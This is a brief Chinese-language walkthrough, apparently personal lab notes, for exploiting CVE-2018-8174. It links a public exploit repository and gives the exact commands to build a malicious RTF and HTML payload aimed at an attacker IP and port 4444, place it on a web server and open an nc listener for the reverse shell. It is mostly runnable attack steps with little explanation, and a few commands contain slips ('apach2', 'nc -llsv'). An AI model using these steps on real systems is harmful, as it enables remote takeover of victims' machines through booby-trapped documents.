先从github上找到对应的exp
https://github.com/Yt1g3r/CVE-2018-8174_EXP
下载然后传进kali攻击机中
生成payload
python CVE-2018-8174.py -u http://192.168.2.111/exp.html -o text.rtf -i 192.168.2.111 -p 4444
-u payload地址 -o 输出的rtf文件名字 -i IP地址 -p 端口
查看多了两个文件 将html文件扔到nginx的网站目录下 然后启动nc监听刚才设置的端口
cp exploit.html /var/www/html/
service apach2 start
nc -llsv 4444